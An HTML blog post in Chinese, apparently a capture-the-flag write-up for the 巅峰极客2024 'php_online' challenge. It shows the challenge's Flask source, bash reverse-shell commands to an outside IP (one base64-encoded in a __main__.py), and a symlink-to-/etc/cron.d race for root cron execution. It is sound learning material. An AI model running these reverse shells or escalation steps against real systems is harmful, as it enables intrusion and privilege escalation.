<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" integrity="sha256-XOqroi11tY4EFQMR9ZYwZWKj5ZXiftSx36RRuC3anlA=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Pisces","darkmode":false,"version":"8.20.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="这个题目搞了很久，前前后后涉及很多细节，复现的过程中出现了很多问题，也暴露出自己的基础不够扎实。网上有很多方式方法，这里一并梳理下。">
<meta property="og:type" content="article">
<meta property="og:title" content="巅峰极客2024 php_online">
<meta property="og:url" content="http://example.com/2026/02/05/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A22024-php-online/index.html">
<meta property="og:site_name" content="My0n9s&#39;blog">
<meta property="og:description" content="这个题目搞了很久，前前后后涉及很多细节，复现的过程中出现了很多问题，也暴露出自己的基础不够扎实。网上有很多方式方法，这里一并梳理下。">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://yk.jsdu.cn/20260205/b4a668b4dab75c32824c93abc5c2416b.png">
<meta property="og:image" content="https://yk.jsdu.cn/20260205/b69c11d493ed0637b6c4ca200a6434aa.png">
<meta property="og:image" content="c:\Users\51261\AppData\Roaming\Typora\typora-user-images\image-20260205182512279.png">
<meta property="og:image" content="https://yk.jsdu.cn/20260205/44bea17cdcd52dd758102dba7162fe26.png">
<meta property="article:published_time" content="2026-02-05T08:00:05.000Z">
<meta property="article:modified_time" content="2026-02-05T10:56:31.821Z">
<meta property="article:author" content="My0n9s">
<meta property="article:tag" content="CTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://yk.jsdu.cn/20260205/b4a668b4dab75c32824c93abc5c2416b.png">


<link rel="canonical" href="http://example.com/2026/02/05/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A22024-php-online/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"http://example.com/2026/02/05/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A22024-php-online/","path":"2026/02/05/巅峰极客2024-php-online/","title":"巅峰极客2024 php_online"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>巅峰极客2024 php_online | My0n9s'blog</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">My0n9s'blog</p>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E5%BC%8F%E4%B8%80%EF%BC%9A%E8%BD%AF%E8%BF%9E%E6%8E%A5%E5%86%99%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1"><span class="nav-number">1.</span> <span class="nav-text">方式一：软连接写定时任务</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%B9%E5%BC%8F%E4%BA%8C%EF%BC%9A%E6%8F%90%E6%9D%83%E5%88%B0www-data"><span class="nav-number">2.</span> <span class="nav-text">方式二：提权到www-data</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="My0n9s"
      src="/images/touxiang.jpeg">
  <p class="site-author-name" itemprop="name">My0n9s</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">105</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">32</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2026/02/05/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A22024-php-online/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/touxiang.jpeg">
      <meta itemprop="name" content="My0n9s">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="My0n9s'blog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="巅峰极客2024 php_online | My0n9s'blog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          巅峰极客2024 php_online
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2026-02-05 16:00:05 / Modified: 18:56:31" itemprop="dateCreated datePublished" datetime="2026-02-05T16:00:05+08:00">2026-02-05</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>这个题目搞了很久，前前后后涉及很多细节，复现的过程中出现了很多问题，也暴露出自己的基础不够扎实。网上有很多方式方法，这里一并梳理下。</p>
<span id="more"></span>

<p>限制输入了8位字母，我这里输入的<code>11111111</code>，就可以进入到php代码执行界面，这里任意PHP代码都能执行，没有任何过滤。所以可以尝试反弹shell，这里可以用php来弹shell，也可以用bash。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">bash弹：</span><br><span class="line">&lt;?php system(&quot;bash -c &#x27;bash -i &gt;&amp; /dev/tcp/220.203.23.131/8020 0&gt;&amp;1&#x27;&quot;);?&gt;</span><br><span class="line">php弹：</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>这里发现成功弹到shell:</p>
<p><img src="https://yk.jsdu.cn/20260205/b4a668b4dab75c32824c93abc5c2416b.png" alt="php_online1"></p>
<p>拿到的是<code>nobody</code>权限，啥都干不了，试了几种提权方式也提不了权。</p>
<p>但是这个题目给了代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, session, redirect, url_for, render_template</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> secrets</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line">app.secret_key = secrets.token_hex(<span class="number">16</span>)</span><br><span class="line">working_id = []</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">index</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        <span class="built_in">id</span> = request.form[<span class="string">&#x27;id&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> <span class="built_in">id</span>.isalnum() <span class="keyword">or</span> <span class="built_in">len</span>(<span class="built_in">id</span>) != <span class="number">8</span>:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;无效的ID&#x27;</span></span><br><span class="line">        session[<span class="string">&#x27;id&#x27;</span>] = <span class="built_in">id</span></span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> os.path.exists(<span class="string">f&#x27;/sandbox/<span class="subst">&#123;<span class="built_in">id</span>&#125;</span>&#x27;</span>):</span><br><span class="line">            os.popen(<span class="string">f&#x27;mkdir /sandbox/<span class="subst">&#123;<span class="built_in">id</span>&#125;</span> &amp;&amp; chown www-data /sandbox/<span class="subst">&#123;<span class="built_in">id</span>&#125;</span> &amp;&amp; chmod a+w /sandbox/<span class="subst">&#123;<span class="built_in">id</span>&#125;</span>&#x27;</span>).read()</span><br><span class="line">        <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;sandbox&#x27;</span>))</span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">&#x27;submit_id.html&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/sandbox&#x27;</span>, methods=[<span class="string">&#x27;GET&#x27;</span>, <span class="string">&#x27;POST&#x27;</span>]</span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">sandbox</span>():</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;GET&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;id&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line">            <span class="keyword">return</span> redirect(url_for(<span class="string">&#x27;index&#x27;</span>))</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="keyword">return</span> render_template(<span class="string">&#x27;submit_code.html&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> request.method == <span class="string">&#x27;POST&#x27;</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;id&#x27;</span> <span class="keyword">not</span> <span class="keyword">in</span> session:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;no id&#x27;</span></span><br><span class="line">        user_id = session[<span class="string">&#x27;id&#x27;</span>]</span><br><span class="line">        <span class="keyword">if</span> user_id <span class="keyword">in</span> working_id:</span><br><span class="line">            <span class="keyword">return</span> <span class="string">&#x27;task is still running&#x27;</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            working_id.append(user_id)</span><br><span class="line">            code = request.form.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">            os.popen(<span class="string">f&#x27;cd /sandbox/<span class="subst">&#123;user_id&#125;</span> &amp;&amp; rm *&#x27;</span>).read()</span><br><span class="line">            os.popen(<span class="string">f&#x27;sudo -u www-data cp /app/init.py /sandbox/<span class="subst">&#123;user_id&#125;</span>/init.py &amp;&amp; cd /sandbox/<span class="subst">&#123;user_id&#125;</span> &amp;&amp; sudo -u www-data python3 init.py&#x27;</span>).read()</span><br><span class="line">            os.popen(<span class="string">f&#x27;rm -rf /sandbox/<span class="subst">&#123;user_id&#125;</span>/phpcode&#x27;</span>).read()</span><br><span class="line">            </span><br><span class="line">            php_file = <span class="built_in">open</span>(<span class="string">f&#x27;/sandbox/<span class="subst">&#123;user_id&#125;</span>/phpcode&#x27;</span>, <span class="string">&#x27;w&#x27;</span>)</span><br><span class="line">            php_file.write(code)</span><br><span class="line">            php_file.close()</span><br><span class="line"></span><br><span class="line">            result = os.popen(<span class="string">f&#x27;cd /sandbox/<span class="subst">&#123;user_id&#125;</span> &amp;&amp; sudo -u nobody php phpcode&#x27;</span>).read()</span><br><span class="line">            os.popen(<span class="string">f&#x27;cd /sandbox/<span class="subst">&#123;user_id&#125;</span> &amp;&amp; rm *&#x27;</span>).read()</span><br><span class="line">            working_id.remove(user_id)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run(debug=<span class="literal">False</span>, host=<span class="string">&#x27;0.0.0.0&#x27;</span>, port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>是python的代码</p>
<p>如果不关掉云服务器上的监听进程，反弹shell的进程就会一直占着，那么我在<code>11111111</code>这个沙箱的前端php执行页面就无法执行php命令，会一直显示<code>task is still running</code>，这是因为<code> result = os.popen(f&#39;cd /sandbox/&#123;user_id&#125; &amp;&amp; sudo -u nobody php phpcode&#39;).read()</code> 这里是反弹了shell的，开启了一个新的进程，这个进程不结束，就不会到程序的下一步，即<code> os.popen(f&#39;cd /sandbox/&#123;user_id&#125; &amp;&amp; rm *&#39;).read()和working_id.remove(user_id)</code> <code>user_id</code>就不会被删除。</p>
<h2 id="方式一：软连接写定时任务"><a href="#方式一：软连接写定时任务" class="headerlink" title="方式一：软连接写定时任务"></a>方式一：软连接写定时任务</h2><p>通过<code>ps -ef</code>  可以发现存在<code>/usr/sbin/cron</code></p>
<p><img src="https://yk.jsdu.cn/20260205/b69c11d493ed0637b6c4ca200a6434aa.png" alt="php_online2"></p>
<p>常见的定时任务是放在<code>/etc/cron.d</code>，可是nobody没有写定时任务的权限，但是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">os.popen(f&#x27;rm -rf /sandbox/&#123;user_id&#125;/phpcode&#x27;).read()</span><br><span class="line">php_file = open(f&#x27;/sandbox/&#123;user_id&#125;/phpcode&#x27;, &#x27;w&#x27;)</span><br><span class="line">php_file.write(code)</span><br><span class="line">php_file.close()</span><br></pre></td></tr></table></figure>

<p>这里是有一个写的动作的，并且内容来自于我们前端表单的数据，是可控的，另外通过前期的<code>ps -ef</code>可以发现是以root权限运行的python程序，所以如果我们建立一个软连接，比如把 <code>/sandbox/xxxxxxxx</code> 指向 <code>/etc/cron.d</code>，那么我们往<code>/sandbox/xxxxxxxx</code>写的数据是不是就到了<code>/etc/cron.d</code>里面。</p>
<p>比如我们弄一个定时任务：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root cat /flag &gt;/tmp/flag.txt</span><br></pre></td></tr></table></figure>

<p>但是直接这样是不行的，因为:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">php_file = open(f&#x27;/sandbox/&#123;user_id&#125;/phpcode&#x27;, &#x27;w&#x27;)</span><br><span class="line">php_file.write(code)</span><br><span class="line">php_file.close()</span><br><span class="line">result = os.popen(f&#x27;cd /sandbox/&#123;user_id&#125; &amp;&amp; sudo -u nobody php phpcode&#x27;).read()</span><br><span class="line">os.popen(f&#x27;cd /sandbox/&#123;user_id&#125; &amp;&amp; rm *&#x27;).read()</span><br><span class="line">working_id.remove(user_id)</span><br></pre></td></tr></table></figure>

<p>存在<code>rm *</code> ，定时任务还没执行就被删除了，所以这里需要条件竞争，让他们不要删的那么快。这个时候就可以利用php代码了，<code> sudo -u nobody php phpcode</code></p>
<p>所以定时任务改成：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root cat /flag &gt;/tmp/flag.txt</span><br><span class="line">#</span><br><span class="line">#&lt;?php  for($i=1;$i&lt;=1000;$i++)&#123;sleep(1000);&#125;?&gt;</span><br></pre></td></tr></table></figure>

<p>对于定时任务文件来说，<code>#</code>是注释符，不会影响到定时任务，对于php文件来说，<code>#</code>不是注释符，所以后面的程序可以正常执行。</p>
<p>到这里，所有的问题基本上迎难而解了。这里还有一个小细节，我们要在软连接之后创建沙箱，因为软连接的链接文件&#x2F;目录是之前不存在的目录。这点 一开始疏忽了，导致复现一直不成功。。。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ln -s [目标文件/目录] [链接文件/目录]</span><br></pre></td></tr></table></figure>

<p>所以我们一开始先创立软连接： <code>ln -s /etc/cron.d  /sandbox/22222222</code> </p>
<p>然后再进入到沙箱创建页面，创建一个<code>22222222</code>的沙箱，接着在php代码执行页面去执行php代码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">* * * * * root cat /flag &gt;/tmp/flag.txt</span><br><span class="line">#</span><br><span class="line">#&lt;?php  for($i=1;$i&lt;=1000;$i++)&#123;sleep(1000);&#125;?&gt;</span><br></pre></td></tr></table></figure>

<p>可以发现<code>phpcode</code>成功写入到了<code>/etc/cron.d</code>里面，过一分钟之后，可以发现 <code>/tmp</code>下存在<code>flag.txt</code>文件。</p>
<p><img src="C:\Users\51261\AppData\Roaming\Typora\typora-user-images\image-20260205182512279.png" alt="image-20260205182512279"></p>
<p>所以用软连接写定时任务的方式不涉及到提权，因为<code>nobody</code>用户权限本身可以执行软连接命令。</p>
<h2 id="方式二：提权到www-data"><a href="#方式二：提权到www-data" class="headerlink" title="方式二：提权到www-data"></a>方式二：提权到www-data</h2><p>这个提权很有意思，结合了<code>rm *</code> 不能删目录的特性以及<code>python</code>语言会优先执行目录下面的<code>__main__.py</code>文件，基于以上两点，并且代码里面有一处<code>os.popen(f&#39;sudo -u www-data cp /app/init.py /sandbox/&#123;user_id&#125;/init.py &amp;&amp; cd /sandbox/&#123;user_id&#125; &amp;&amp; sudo -u www-data python3 init.py&#39;).read()</code></p>
<p>这里有一个用<code>www-data</code>权限执行<code>init.py</code>的动作，如果这个时候<code>init.py</code>它是一个目录，并且底下存在一个<code>__main__.py</code>文件，<code>__main__.py</code>文件内容可控，那我们反弹一下shell，就可以拿到<code>www-data</code>权限了。</p>
<p>接下来我们可以尝试一下，前面的步骤一样，先弹一遍shell拿到<code>nobody</code>权限，接着</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">cd /sandbox/11111111</span><br><span class="line">rm init.py</span><br><span class="line">mkdir init.py</span><br><span class="line">chmod 777 init.py</span><br><span class="line">cd init.py</span><br><span class="line">echo &#x27;aW1wb3J0IG9zCm9zLnN5c3RlbSgnYmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8yMjAuMjAzLjIzLjEzMS84MDMwIDA+JjEiJyk=&#x27; | base64 -d &gt; __main__.py</span><br><span class="line">###aW1wb3J0IG9zCm9zLnN5c3RlbSgnYmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8yMjAuMjAzLjIzLjEzMS84MDMwIDA+JjEiJyk= 为</span><br><span class="line">import os</span><br><span class="line">os.system(&#x27;bash -c &quot;bash -i &gt;&amp; /dev/tcp/220.203.23.131/8030 0&gt;&amp;1&quot;&#x27;)</span><br><span class="line">的base64编码</span><br></pre></td></tr></table></figure>

<p>然后我们kill掉这次反弹shell的进程，重新监听8030端口，依然利用<code>11111111</code>这个沙箱，随便输入一段PHP代码，来触发python的执行。</p>
<p><img src="https://yk.jsdu.cn/20260205/44bea17cdcd52dd758102dba7162fe26.png" alt="php_online4"></p>
<p>成功拿到<code>www-data</code>权限</p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/CTF/" rel="tag"># CTF</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2026/01/28/%E5%B7%85%E5%B3%B0%E6%9E%81%E5%AE%A22024/" rel="prev" title="巅峰极客2024">
                  <i class="fa fa-angle-left"></i> 巅峰极客2024
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2026</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">My0n9s</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" rel="noopener" target="_blank">NexT.Pisces</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
